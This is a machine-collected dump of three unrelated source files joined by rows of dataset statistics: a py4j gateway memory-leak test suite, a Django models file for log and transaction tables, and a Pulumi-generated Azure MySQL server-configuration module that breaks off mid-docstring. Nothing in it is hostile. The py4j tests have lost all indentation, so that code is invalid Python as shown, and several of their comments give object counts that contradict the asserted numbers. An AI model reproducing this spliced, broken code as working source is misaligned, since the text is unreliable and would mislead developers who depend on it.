gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
gateway.shutdown()
# 14 objects: JavaGateway, CallbackSerer, GatewayClient,
# GatewayProperty, PythonPing, 5 GatewayConnection,
# 4 CallbackConnection. Notice the symmetry
# One more gateway connection created because we called shutdown
# after close (which requires a connection to send a shutdown
# command).
assert_python_memory(self, 14)
def testJavaToPythonToJavaCleanGC(self):
def internal_work(gateway):
hello_state = HelloState2()
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(True)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
internal_work(gateway)
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGC(self):
def internal_work(gateway):
hello_state = HelloState2(run_gc=False)
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(True)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
# We disable gc to test whether a shut down on one side will
# garbage collect everything.
gc.disable()
internal_work(gateway)
gc.enable()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
def testJavaToPythonToJavaCleanGCNoShutdown(self):
def internal_work(gateway):
hello_state = HelloState2()
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(False)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
internal_work(gateway)
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGCNoShutdown(self):
def internal_work(gateway):
hello_state = HelloState2(run_gc=False)
gateway2 = InstrJavaGateway(
gateway_parameters=GatewayParameters(
port=DEFAULT_PORT+5),
callback_server_parameters=CallbackServerParameters(
port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = gateway2
sleep()
gateway.entry_point.startServerWithPythonEntry(False)
sleep()
gateway2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process():
gateway = JavaGateway()
# We disable gc to test whether a shut down on one side will
# garbage collect everything.
gc.disable()
internal_work(gateway)
gc.enable()
python_gc()
gateway.jvm.py4j.instrumented.MetricRegistry.forceFinalization()
sleep()
createdSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = gateway.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 6 objects: 2 InstrumentedObject (sayHello called twice), 1
# InstrGatewayServer, 1 CallbackClient, 1 CallbackConnection, 1
# GatewayConnection
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
gateway.shutdown()
# 7 objects: JavaGateway, GatewayClient, CallbackServer,
# GatewayProperty, HelloState, GatewayConnection,
# CallbackConnection
assert_python_memory(self, 7)
class ClientServerTest(unittest.TestCase):
def tearDown(self):
MEMORY_HOOKS.clear()
CREATED.clear()
FINALIZED.clear()
def testPythonToJava(self):
def work_with_object(clientserver):
obj = clientserver.jvm.py4j.\
instrumented.InstrumentedObject("test")
return str(obj)
def internal_work():
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
work_with_object(clientserver2)
python_gc()
sleep()
clientserver2.shutdown()
with gateway_server_example_app_process(False):
clientserver = ClientServer()
clientserver.entry_point.startServer2()
internal_work()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 5 objects: ClientServer, ClientServerConnection, PythonClient,
# JavaServer, InstrumentedObject
self.assertEqual(5, len(createdSet))
self.assertEqual(5, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 5 objects: ClientServer, ClientServerConnection, PythonClient,
# JavaServer, GatewayProperty
assert_python_memory(self, 5)
def testPythonToJavaToPython(self):
def play_with_ping(clientserver):
ping = InstrumentedPythonPing()
pingpong = clientserver.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work():
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(clientserver2)
python_gc()
sleep()
clientserver2.shutdown()
with gateway_server_example_app_process(False):
clientserver = ClientServer()
clientserver.entry_point.startServer2()
internal_work()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 4 objects: ClientServer, ClientServerConnection, JavaServer,
# PythonClient
self.assertEqual(4, len(createdSet))
self.assertEqual(4, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 6 objects: ClientServer, PythonServer, JavaClient,
# GatewayProperty, PythonPing, ClientServerConnection
def testPythonToJavaToPythonClose(self):
def play_with_ping(clientserver):
ping = InstrumentedPythonPing()
pingpong = clientserver.jvm.py4j.examples.PingPong()
total = pingpong.start(ping)
return total
def internal_work(assert_memory):
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5))
sleep()
play_with_ping(clientserver2)
python_gc()
sleep()
clientserver2.close(
close_callback_server_connections=True,
keep_callback_server=True)
sleep()
assert_memory()
clientserver2.shutdown()
sleep()
with gateway_server_example_app_process(False):
clientserver = ClientServer()
clientserver.entry_point.startServer2()
def perform_memory_tests():
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.\
MetricRegistry.getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.\
MetricRegistry.getFinalizedObjectsKeySet()
# 6 objects: ClientServer, JavaServer,
# PythonClient, 3 ClientServerConnection.
self.assertEqual(6, len(createdSet))
# Should be 2: ClientServer, 1 ClientServerConnection
# But for some reasons, Java refuses to collect the
# clientserverconnection even though there are no strong
# references.
self.assertEqual(1, len(finalizedSet))
# 8 objects: ClientServer, PythonServer, JavaClient,
# GatewayProperty, PythonPing, 3 ClientServerConnection
self.assertEqual(8, len(CREATED))
# PythonPing + ClientServerConnection
self.assertEqual(2, len(FINALIZED))
internal_work(perform_memory_tests)
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
clientserver.shutdown()
# 9 objects: ClientServer, PythonServer, JavaClient,
# GatewayProperty, PythonPing, 4 ClientServerConnection
assert_python_memory(self, 9)
def testJavaToPythonToJavaCleanGC(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(True)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
internal_work(clientserver)
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 7 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 2
# ClientServerConnection (1 to call sayHello)
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (1)
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGC(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(True)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
# We disable gc to test whether a shut down on one side will
# garbage collect everything.
gc.disable()
internal_work(clientserver)
gc.enable()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 7 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 2
# ClientServerConnection (1 to call sayHello)
self.assertEqual(6, len(createdSet))
self.assertEqual(6, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (2)
assert_python_memory(self, 7)
def testJavaToPythonToJavaCleanGCNoShutdown(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(False)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
# We disable gc to test whether a shut down on one side will
# garbage collect everything.
internal_work(clientserver)
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 8 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 3
# ClientServerConnection (1 to call sayHello,
# 1 that receives shutdown command)
self.assertEqual(7, len(createdSet))
self.assertEqual(7, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (2)
assert_python_memory(self, 7)
def testJavaToPythonToJavaNoGCNoShutdown(self):
def internal_work(clientserver):
hello_state = HelloState2()
clientserver2 = InstrClientServer(
JavaParameters(port=DEFAULT_PORT+5),
PythonParameters(port=DEFAULT_PYTHON_PROXY_PORT+5),
python_server_entry_point=hello_state)
hello_state.gateway = clientserver2
sleep()
clientserver.entry_point.startServerWithPythonEntry(False)
sleep()
clientserver2.shutdown()
# Check that Java correctly called Python
self.assertEqual(2, len(hello_state.calls))
self.assertEqual((None, None), hello_state.calls[0])
self.assertEqual((2, "Hello World"), hello_state.calls[1])
with gateway_server_example_app_process(False):
clientserver = ClientServer()
# We disable gc to test whether a shut down on one side will
# garbage collect everything.
gc.disable()
internal_work(clientserver)
gc.enable()
python_gc()
clientserver.jvm.py4j.instrumented.MetricRegistry.\
forceFinalization()
sleep()
createdSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getCreatedObjectsKeySet()
finalizedSet = clientserver.jvm.py4j.instrumented.MetricRegistry.\
getFinalizedObjectsKeySet()
# 7 objects: 2 InstrumentedObject (sayHello called twice), 1
# JavaServer, 1 PythonClient, 1 ClientServer, 3
# ClientServerConnection (1 to call sayHello,
# 1 that receives shutdown command)
self.assertEqual(7, len(createdSet))
self.assertEqual(7, len(finalizedSet))
self.assertEqual(createdSet, finalizedSet)
clientserver.shutdown()
# 8 objects: ClientServer (ok), PythonServer (ok), JavaClient,
# GatewayProperty, HelloState (ok), 3 ClientServer Connections (2)
assert_python_memory(self, 7)
| 40.507833
| 78
| 0.618099
| 2,649
| 31,029
| 7.081918
| 0.090223
| 0.054371
| 0.047601
| 0.077399
| 0.848827
| 0.835394
| 0.801493
| 0.793923
| 0.773987
| 0.762473
| 0
| 0.016005
| 0.305295
| 31,029
| 765
| 79
| 40.560784
| 0.854287
| 0.16549
| 0
| 0.829091
| 0
| 0
| 0.009895
| 0.003648
| 0
| 0
| 0
| 0
| 0.161818
| 1
| 0.085455
| false
| 0
| 0.018182
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
674cd9effe46aa856791aad5cfee5cbd9ff2ea52
| 6,639
|
py
|
Python
|
aimsweb/aims/models.py
|
DNATUNA/ELKDjangoWork
|
8c1b20e802a16d3d7922d1e20c80a900c23ffad1
|
[
"MIT"
] | null | null | null |
aimsweb/aims/models.py
|
DNATUNA/ELKDjangoWork
|
8c1b20e802a16d3d7922d1e20c80a900c23ffad1
|
[
"MIT"
] | 3
|
2019-11-23T05:08:18.000Z
|
2021-06-10T21:06:51.000Z
|
aimsweb/aims/models.py
|
DNATUNA/ELKDjangoWork
|
8c1b20e802a16d3d7922d1e20c80a900c23ffad1
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.utils import timezone
from django.urls import reverse
# Create your models here.
class LogInfo(models.Model):
aims_id = models.CharField(max_length=100)
host_id = models.CharField(max_length=100)
app_id = models.CharField(max_length=100)
app_name = models.CharField(max_length=100)
system_status = models.CharField(max_length=100)
log_agent_name = models.CharField(max_length=100)
description = models.TextField(blank=True, null=True)
use_yn = models.TextField(blank=True, default="Y", max_length=1)
prediction_qual = models.CharField(blank=True, null=True, max_length=100)
prediction_model = models.CharField(blank=True, null=True, max_length=100)
prediction_model_version = models.CharField(blank=True, null=True, max_length=100)
ptn001_cnt = models.CharField(blank=True, null=True, max_length=100)
ptn001_ratio = models.CharField(blank=True, null=True, max_length=100)
ptn002_cnt = models.CharField(blank=True, null=True, max_length=100)
ptn002_ratio = models.CharField(blank=True, null=True, max_length=100)
ptn003_cnt = models.CharField(blank=True, null=True, max_length=100)
ptn003_ratio = models.CharField(blank=True, null=True, max_length=100)
ptn004_cnt = models.CharField(blank=True, null=True, max_length=100)
created_date = models.DateTimeField(default=timezone.now)
published_date = models.DateTimeField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.aims_id
def get_absolute_url(self):
return reverse("loginfo:detail", kwargs={"aims_id": self.aims_id})
class HostInfo(models.Model):
host_id = models.CharField(max_length=100)
host_name = models.CharField(max_length=100)
host_ip = models.CharField(max_length=100)
host_desc = models.CharField(max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
class AppInfo(models.Model):
app_id = models.CharField(max_length=100)
app_name = models.CharField(max_length=100)
app_desc = models.CharField(max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
class MonthlyTranInfo(models.Model):
log_mid = models.CharField(max_length=100)
tran_w1_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w1_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w1_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w1_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w2_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w2_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w2_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w2_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w3_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w3_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w3_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w3_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w4_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w4_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w4_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w4_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_w5_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_w5_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_w5_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_w5_errratio = models.CharField(blank=True, null=True, max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
class WeeklyTranInfo(models.Model):
log_mid = models.CharField(max_length=100)
tran_d1_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d1_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d1_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d1_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d2_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d2_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d2_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d2_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d3_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d3_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d3_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d3_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d4_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d4_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d4_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d4_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d5_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d5_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d5_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d5_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d6_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d6_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d6_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d6_errratio = models.CharField(blank=True, null=True, max_length=100)
tran_d7_cnt = models.CharField(blank=True, null=True, max_length=100)
tran_d7_errcnt = models.CharField(blank=True, null=True, max_length=100)
tran_d7_ratio = models.CharField(blank=True, null=True, max_length=100)
tran_d7_errratio = models.CharField(blank=True, null=True, max_length=100)
use_yn = models.CharField(max_length=100)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField(blank=True, null=True)
| 54.418033
| 86
| 0.758096
| 985
| 6,639
| 4.880203
| 0.08731
| 0.146037
| 0.19222
| 0.226337
| 0.897857
| 0.891408
| 0.870605
| 0.841689
| 0.841689
| 0.841689
| 0
| 0.051995
| 0.128031
| 6,639
| 121
| 87
| 54.867769
| 0.778373
| 0.003615
| 0
| 0.201923
| 0
| 0
| 0.003327
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028846
| false
| 0
| 0.028846
| 0.019231
| 0.980769
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
67698258d58d0a1918ac97b7476911f69f73bf86
| 17,613
|
py
|
Python
|
sdk/python/pulumi_azure/mysql/flexible_server_configuration.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/mysql/flexible_server_configuration.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/mysql/flexible_server_configuration.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['FlexibleServerConfigurationArgs', 'FlexibleServerConfiguration']
@pulumi.input_type
class FlexibleServerConfigurationArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
server_name: pulumi.Input[str],
value: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FlexibleServerConfiguration resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "value", value)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _FlexibleServerConfigurationState:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering FlexibleServerConfiguration resources.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
class FlexibleServerConfiguration(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
